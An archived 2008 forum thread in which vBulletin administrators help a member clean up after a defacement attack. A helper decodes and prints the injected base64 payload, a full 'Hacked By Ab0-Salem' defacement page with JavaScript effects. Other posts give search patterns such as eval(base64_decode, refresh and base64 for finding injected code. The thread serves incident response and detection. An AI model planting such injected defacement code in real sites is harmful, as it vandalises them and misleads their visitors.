vb.org Archive
Page 4 of 5 « First 23 4 5
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   Got hacked. What now? (https://vborg.vbsupport.ru/showthread.php?t=193796)

Berethorn 10-16-2008 11:34 PM
Alright. I'll try to beef up the guard. :)

Quarterbore 10-16-2008 11:53 PM
I would be curious to see the code they added if you can send me a PM with the encripted code. I am sure it is just an encripted refresh but I will see if I can decript it. I have been studying the enemy for a while and there probably isn't much I can get from the code but I would still like to see it for basic syntax.

You obviously have something they were able to take advantage of to do a sql injection. So, as suggested get the forums upgraded and evaluate your hacks you have added. Also, don't forget to get the automated database backups running as if they did this the hacker could have deleted your entire database as well!

TheLastSuperman 10-17-2008 12:08 AM
Ok, guilty as charged... I skimmed a bit...

Here's what I would do:

Make a backup now instead of tinkering w/ the only (although hacked) full version of your database that exist. Make a copy of that and tinker w/ it!

Check the FTP or File Manager for recently modified files or folders and review the code. Also make sure however your vewing the files you have it to where it's not hiding any from your view.

As for restoring a large DB try bigdump.php or SQLyog Enterprise and give it a shot!

S-MAN

Berethorn 10-17-2008 12:09 AM
Yes, luckily it wasn't a destructive hack; more of an informative one. I'll send it to you in a sec.

Unfortunately I have to pay $60 to renew to download anything above 3.6.8. I don't think it's feasible for me now.

Quarterbore 10-17-2008 12:26 AM
Thanks for the code and for your reference you should never send code like that unmodified. For example, if you get encrypted code like that if you modify the start of the encrypted code so it is changed...

From: eval(base64_decode('

To: eval(baNOCODEse64_decNOTode('

The code can not be executed! You really have to be careful with encrypted code like that as you never know everything it does until it is decrypted. Luckily, there are tools out there that can decript stuff pretty darned easily anymore.

--------------- Added [DATE]1224207351[/DATE] at [TIME]1224207351[/TIME] ---------------

I decripted the code and it was relatively harmless HTML code. There was nothing in there to log passwords as an example.

I am posting the code here just for the record and so you can see it. That nonsense of letters and numbers when decoded is the code that follows!

PHP Code:
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<!-- saved from url=(0026)http://woot.king-nerd.com/ -->
<HTML 
dir=rtl><HEAD><TITLE>:.: Hacked By ِAb0-Salem :.:</TITLE>
<SCRIPT language=javascript src=\"index4_files/ads.js\"></SCRIPT>

<META http-equiv=Content-Type content=\"text/html; charset=windows-1256\">
<META http-equiv=Content-Language content=en-us>
<STYLE>TABLE.MsoNormalTable {
    FONT-SIZE: 10pt; FONT-FAMILY: \"Times New Roman\"; mso-style-parent: \"\"
}
.page {
    BACKGROUND: #000000; FONT: bold 12pt arial,verdana,helvetica,sans-serif; COLOR: #acacac
}
.vbmenu_popup {
    BORDER-RIGHT: #21728f 1px solid; BORDER-TOP: #21728f 1px solid; BACKGROUND: #000000; FONT: 8pt ms sans serif,arial; BORDER-LEFT: #21728f 1px solid; COLOR: #acacac; BORDER-BOTTOM: #21728f 1px solid
}
.thead {
    FONT-WEIGHT: normal; FONT-SIZE: 8pt; BACKGROUND: #000000 repeat-x left top; COLOR: #ebebeb; FONT-STYLE: normal; FONT-FAMILY: ms sans serif, arial; FONT-VARIANT: normal
}
TD.thead {
    PADDING-RIGHT: 4px; PADDING-LEFT: 4px; PADDING-BOTTOM: 4px; PADDING-TOP: 4px
}
.tborder {
    BACKGROUND: #000000
}
.alt1 {
    BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #acacac
}
DIV {
    COLOR: #000
}
DIV {
    FONT-FAMILY: arial,sans-serif
}
DIV.Section1 {
    page: Section1
}
</STYLE>
<BGSOUND src=\"\" loop=infinite>
<META content=\"MSHTML 6.00.2900.3314\" name=GENERATOR></HEAD>
<BODY text=#c0c0c0 vLink=#c0c0c0 aLink=#c0c0c0 link=#c0c0c0 bgColor=#000000>
<P></P>&nbsp;
<SCRIPT language=JavaScript> if (document.all){ Cols=15; Cl=24; Cs=50; Ts=12;  Tc='#008800'; Tc1='red'; MnS=25;  MxS=30;  I=Cs; Sp=new Array();S=new Array();Y=new Array(5,6); C=new Array();M=new Array();B=new Array(); RC=new Array();E=new Array();Tcc=new Array(\"x\",\"h\",\"a\",\"h\",1,\"x\"); document.write(\"<div id='Container' style='position:absolute;top:0;left:-\"+Cs+\"'>\"); document.write(\"<div style='position:relative'>\"); for(i=0; i < Cols; i++){ S[i]=I+=Cs; document.write(\"<div id='A' style='position:absolute;top:0;font-family:Arial;font-size:\" +Ts+\"px;left:\"+S[i]+\";width:\"+Ts+\"px;height:0px;color:\"+Tc+\";visibility:hidden'></div>\"); } document.write(\"</div></div>\"); for(j=0; j < Cols; j++){ RC[j]=1+Math.round(Math.random()*Cl);   Y[j]=0; Sp[j]=Math.round(MnS+Math.random()*MxS);  for(i=0; i < RC[j]; i++){ B[i]=''; C[i]=Math.round(Math.random()*1)+' '; M[j]=B[0]+=C[i]; } } function Cycle(){ Container.style.top=window.document.body.scrollTop; for (i=0; i < Cols; i++){ var r = Math.floor(Math.random()*Tcc.length); E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>'; Y[i]+=Sp[i]; if (Y[i] > window.document.body.clientHeight){ for(i2=0; i2 < Cols; i2++){ RC[i2]=1+Math.round(Math.random()*Cl);   for(i3=0; i3 < RC[i2]; i3++){ B[i3]=''; C[i3]=Math.round(Math.random()*1)+' '; C[Math.floor(Math.random()*i2)]=' '+' '; M[i]=B[0]+=C[i3]; Y[i]=-Ts*M[i].length/1; A[i].style.visibility='visible'; } Sp[i]=Math.round(MnS+Math.random()*MxS); } } A[i].style.top=Y[i]; A[i].innerHTML=M[i]+' '+E[i]+' '; } setTimeout('Cycle()',50) } Cycle(); } </SCRIPT>

<SCRIPT language=JavaScript> puchtit=\"] Ab0-Salem [\"; letrero2=\"·.¸¸.·´´¯`··._.··.¸¸.·´´¯`··._.··.¸¸.·´´¯\"; letrero1=\"·.¸¸.·´´¯`··._.··.¸¸.·´´¯`··._.··.¸¸.·´´¯\";;ultimo1=letrero1.length-1; ultimo2=letrero2.length-1; tiempo=setTimeout(\"scroll()\",.1); function scroll() { aux1=letrero1.charAt(ultimo1-1); letrero1=aux1+letrero1.substring(0,ultimo1-1); aux2=letrero2.charAt(0); letrero2=letrero2.substring(1,ultimo2+1)+aux2; window.status=\"(\" + letrero2 + puchtit + letrero1 + \")\"; tiempo=setTimeout(\"scroll()\",.1); return true; } // --> </SCRIPT>
 
<DIV style=\"COLOR: #000; FONT-FAMILY: arial,sans-serif\" align=center><SPAN 
style=\"HEIGHT: 30px\">
<DIV class=Section1>
<DIV 
style=\"WIDTH: 900px; COLOR: rgb(0,0,0); FONT-FAMILY: arial,sans-serif; HEIGHT: 374px\" 
align=center>
<TABLE style=\"WIDTH: 90%\" height=500 cellPadding=0 width=\"90%\" border=0>
  <TBODY>
  <TR>
    <TD 
    style=\"BORDER-RIGHT: red 0.75pt solid; PADDING-RIGHT: 0.75pt; BORDER-TOP: red 0.75pt solid; PADDING-LEFT: 0.75pt; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 0.75pt; BORDER-LEFT: red 0.75pt solid; COLOR: rgb(28,176,129); PADDING-TOP: 0.75pt; BORDER-BOTTOM: red 0.75pt solid; FONT-STYLE: normal; FONT-FAMILY: verdana,geneva,lucida,'lucida grande',arial,helvetica,sans-serif; FONT-VARIANT: normal\"></FONT></B></FONT></FONT>
      <P align=center><SPAN lang=ar-sa><B><FONT face=\"Traditional Arabic\" 
      color=#ffffff size=5></FONT></B></SPAN>&nbsp;</P>
      <P dir=ltr align=center><B><FONT face=Verdana color=#e0e0e0>H0 H0, You G0t 
        Defaced<SPAN lang=en-us> Just Be CoOol And Learn</SPAN> 
      !</FONT></B></P><SPAN>
      <P align=center>&nbsp;</P></SPAN>
      <FONT face=\"Arial Narrow\" size=4>
    <P align=center>
    &nbsp;</P><SPAN>
      <P dir=ltr align=center><B><FONT face=Verdana color=#00ff00 
      size=5>&nbsp;</FONT></B><FONT face=Verdana color=#00ff00 
      size=5>[</FONT><B><FONT face=Verdana color=#00ff00 size=5> W3 Do Wh4t w3 
        s4y</FONT></B><FONT face=Verdana color=#00ff00 size=5> ]<SPAN 
      lang=ar-eg>&nbsp; </SPAN></FONT></P>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center><SPAN style=\"TEXT-TRANSFORM: uppercase\"><FONT 
      face=\"Monotype Corsiva\"><SPAN lang=en-us><FONT color=#ffffff size=6>HaCkEd 
        By ;</FONT></SPAN></FONT></SPAN></P>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center><B><FONT face=Verdana 
      size=5>&nbsp;</FONT></B><FONT face=Verdana color=#999999 
      size=5>[</FONT><B><FONT face=Verdana color=#e0e0e0 size=5> Ab0-Salem 
      </FONT></B><FONT face=Verdana color=#999999 size=5>]</FONT></P>
      <P dir=ltr style=\"TEXT-ALIGN: center\"><FONT face=\"Courier New\" 
      color=#999999 size=4><B>Wh3r3 is The Security Dude ?</B></FONT></P>
      <P dir=ltr style=\"TEXT-ALIGN: center\"><B><FONT face=\"Courier New\" 
      color=#999999 size=4>&nbsp;Yeah, IT Seems Security Doomed to FAILURE 
      </FONT><FONT face=\"Microsoft Sans Serif\" color=#999999 size=4>(^_*) .. 
      </FONT></B></P>
      <P align=center><B><FONT face=Verdana color=#999999 size=2>Just Secure 
        Your Mind , Then Secure Your Site Dude !</FONT></B></P></SPAN>
      <P align=center><SPAN lang=ar-sa><FONT color=#ff00ff 
      size=4>==--===</FONT><FONT size=4><FONT 
      color=#ffff00>--===--===--=</FONT><FONT 
      color=#ff0000>==--===--===</FONT><FONT color=#ffff00>--===--</FONT><FONT 
      color=#008000>===--===--=</FONT></FONT><FONT color=#ffff00 
      size=4>==</FONT></SPAN></P>
      <P dir=ltr style=\"TEXT-ALIGN: center\"><FONT face=Verdana color=#ffffff>W3 
        M4k3 Th!s ++++en N3t</P>
      <P dir=ltr style=\"TEXT-ALIGN: center\">Try To Play With Us And U Will Know 
        The W3 r Th3 G4m3</FONT></P><SPAN>
      <P align=center><SPAN lang=ar-sa><FONT color=#ff00ff 
      size=4>==--===</FONT><FONT size=4><FONT 
      color=#ffff00>--===--===--=</FONT><FONT 
      color=#ff0000>==--===--===</FONT><FONT color=#ffff00>--===--</FONT><FONT 
      color=#008000>===--===--=</FONT></FONT><FONT color=#ffff00 
      size=4>==</FONT></SPAN></P></SPAN>
      <P align=center>&nbsp;</P><SPAN>
      <P dir=ltr align=center><B><FONT face=Verdana 
      size=5>&nbsp;</FONT></B><FONT face=Verdana color=#ff0000 
      size=5>[</FONT><B><FONT face=Verdana color=#e0e0e0 size=5> 
      Ab0-Salem</FONT></B><FONT face=Verdana color=#ff0000 
      size=5>]</FONT></P></SPAN>
      <P align=center><SPAN><FONT face=Verdana color=#ff0000 size=5><A 
      href=\"\"></A></FONT></SPAN></P>
      <P dir=ltr align=center><FONT face=Verdana color=#ff0000 size=5><A 
      ></A></FONT></P><SPAN>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center>&nbsp;</P></SPAN>
      <P align=center>&nbsp;</P>
      <P dir=rtl style=\"DIRECTION: rtl; unicode-bidi: embed\" align=center><EMBED 
      name=video pluginspage=http://www.real.com/player/ 
      src=http://www.members.lycos.co.uk/sn1p3r/mu/nana.rm width=165 height=62 
      hidden=true type=audio/x-pn-realaudio-plugin loop=\"true\" autostart=\"true\" 
      nojava=\"true\" controls=\"ControlPanel,StatusBar\" maintainaspect=\"false\"> 
      </P></TR></TBODY></TABLE></DIV></DIV></SPAN></DIV></BODY></HTML>
"

Berethorn 10-17-2008 12:42 AM
Oh dear, that was clumsy of me. :(

Hornstar 11-01-2008 03:50 AM
Quote:
Originally Posted by Quarterbore (Post 1646713)
...try looking for "REFRESH" or "HTTP-EQUIV"

I know you don't know me but if you would like help I would be glad to try to help but the only I could do that is to get access to your database. I am very curious how they did this for the tool I am coding hence my interest.

EDIT: you are searching like this, right:

%refresh%
%http-equiv%
%index4_files%

I ask as I get hits for the first two and my site is not hacked. But there are not may of them so you can look at them to find the cause.

Also search for this if you are not finding anything...

%base64%
I searched my database for %base64% and found quite a fair few hits but can not determine which are legit or not.

My site got hacked last week and I found a different method to get my templates showing up instead of the hacked version, however i still have a couple of the hacked templates up as I have not had time to change those just yet.

Any idea what table name, or what kind of code i should be looking for more exactly?

Quarterbore 11-03-2008 06:02 PM
There shouldn't be any base 64 scripts in your forums ;)

puertoblack2003 11-04-2008 01:31 AM
how is that even embed? is it a mod badly written?

Hornstar 11-05-2008 06:07 AM
Quote:
Originally Posted by Quarterbore (Post 1658765)
There shouldn't be any base 64 scripts in your forums ;)
What should I do?

Search results for "%base64%" at least one of the words:
2 match(es) inside table vb3_datastore
4 match(es) inside table vb3_plugin
2 match(es) inside table vb3_pmtext
4 match(es) inside table vb3_post
3 match(es) inside table vb3_postedithistory
1 match(es) inside table vb3_postparsed
1 match(es) inside table vb3_word

Total: 17

Example: Table: vb3_word

Code:
Code:
    SQL query:        SELECT  *
FROM  `***_***`.`vb3_word`
WHERE ( `wordid`  LIKE  '%%base64%%'
OR  `title`  LIKE CONVERT( _utf8 '%%base64%%'
USING latin1 )
COLLATE latin1_swedish_ci
)
LIMIT 0 , 30

Wordid: 57647
title: base64


Example: table vb3_plugin
Code:
    SQL query:        SELECT  *
FROM  `***_***`.`vb3_plugin`
WHERE ( `pluginid`  LIKE  '%%base64%%'
OR  `title`  LIKE CONVERT( _utf8 '%%base64%%'
USING latin1 )
COLLATE latin1_swedish_ci
OR  `hookname`  LIKE CONVERT( _utf8 '%%base64%%'
USING latin1 )
COLLATE latin1_swedish_ci
OR  `phpcode`  LIKE CONVERT( _utf8 '%%base64%%'
USING latin1 )
COLLATE latin1_swedish_ci
OR  `product`  LIKE CONVERT( _utf8 '%%base64%%'
USING latin1 )
COLLATE latin1_swedish_ci
OR  `devkey`  LIKE CONVERT( _utf8 '%%base64%%'
USING latin1 )
COLLATE latin1_swedish_ci
OR  `active`  LIKE  '%%base64%%'
OR  `executionorder`  LIKE  '%%base64%%'
)
LIMIT 0 , 30
Code:
$attachpatch_patchfirstpost = array ();
global $foruminfo, $vbulletin;

if (!empty ($vbulletin->options['attachpatch_patchfirstpost'])) {
    $attachpatch_patchfirstpost = preg_replace ('/[^0-9,]*/', '', $vbulletin->options['attachpatch_patchfirstpost']);
    $attachpatch_patchfirstpost = explode (',', $attachpatch_patchfirstpost);
}

if
(
    $vbulletin->options['attachpatch_enable']
    AND
    (
        in_array($foruminfo['forumid'], $attachpatch_patchfirstpost)
        OR
        $vbulletin->options['attachpatch_patchfirstpost'] == -1
    )
    AND
    $post['parentid'] == 0
)
{
    if (!isset ($attachpatchinfo))
    {
        // initialize my variables
        $attachpatchinfo = array ();
        $attachpatchinfo['mycounter'] = 0;    // counts loop iterations
        $attachpatchinfo['combinedfilesize'] = 0;
        $attachpatchinfo['moderatedattachments'] = '';
        $attachpatchinfo['showmoderatedattachments'] = false;
        $attachpatchinfo['visibleattachments'] = false;
        $attachpatchinfo['attachmentids'] = array ();
        $attachpatchinfo['dateline'] = 0;
        $attachpatchinfo['counter'] = 0;    // this is the vB download counter for the attachment
    }

    // count attachments to know the last time we go thru the loop
    ++$attachpatchinfo['mycounter'];

    if ($attachment['visible'])
    {
        // do the necessary stuff from the original loop in the function
        // skip the various built-in vb templates (image/thumbnail etc)
        if (THIS_SCRIPT == 'external')
        {
            $attachment['counter'] = $vbphrase['n_a'];
            $show['views'] = false;
        }
        else
        {
            $show['views'] = true;
        }

        // remember that there is at least one visible (not moderated) attachment
        $attachpatchinfo['visibleattachments'] = true; 

        // add up total filesize of non-moderated attachmentes
        $attachpatchinfo['combinedfilesize'] += $attachment['filesize_real'];

        // save the attachment ids, dateline & counter to output in the template
        $attachpatchinfo['attachmentids'][] = $attachment['attachmentid'];
        $attachpatchinfo['dateline'] = $attachment['dateline']; // dateline & counter will end up being that of the
        $attachpatchinfo['counter'] = $attachment['counter'];  // last attachment, but that should suffice.
    }
    else
    {
        // do default vb moderated attachments (but save 'em to our variable)
        eval('$attachpatchinfo[\'moderatedattachments\'] .= "' . fetch_template('postbit_attachmentmoderated') . '";');
        $attachpatchinfo['showmoderatedattachments'] = true;
    }

    // set to false so that the vB original loop does less
    // it does a moderated attachment instead of the real ones.
    // which will have to be erased later.
    $attachment['visible'] = false;

    // last time thru the loop, save the info for later.
    if ($attachpatchinfo['mycounter'] == $attachcount)
    {
        // format the filesize nicely
        $attachpatchinfo['combinedfilesizepretty'] = vb_number_format($attachpatchinfo['combinedfilesize'], 1, true);

        // save the whole she-bang for the next plugin.
        $this->post['attachpatchinfo'] = $attachpatchinfo;

        // we know there's at least on visible (not moderated) attachment
        if ($attachpatchinfo['visibleattachments'])
        {
            $attachpatchinfo['attachmentids'] = implode(',', $attachpatchinfo['attachmentids']);
           
            global $threadinfo;
            $attachpatchinfo['encodedthreadtitle'] = urlencode(base64_encode($threadinfo['title']));
           
            // process all attachments thru the postbit_attachmentszippedtogether template
            // do it here at the end, so it only gets done once.
            eval('$this->post[\'otherattachments\'] .= "' . fetch_template('postbit_attachmentszippedtogether') . '";');
            $show['otherattachment'] = true;
        }
    }
}


All times are GMT. The time now is 07:02 AM.
Page 4 of 5 « First 23 4 5
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.02731 seconds
  • Memory Usage 1,848KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (4)bbcode_code_printable
  • (1)bbcode_php_printable
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (3)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete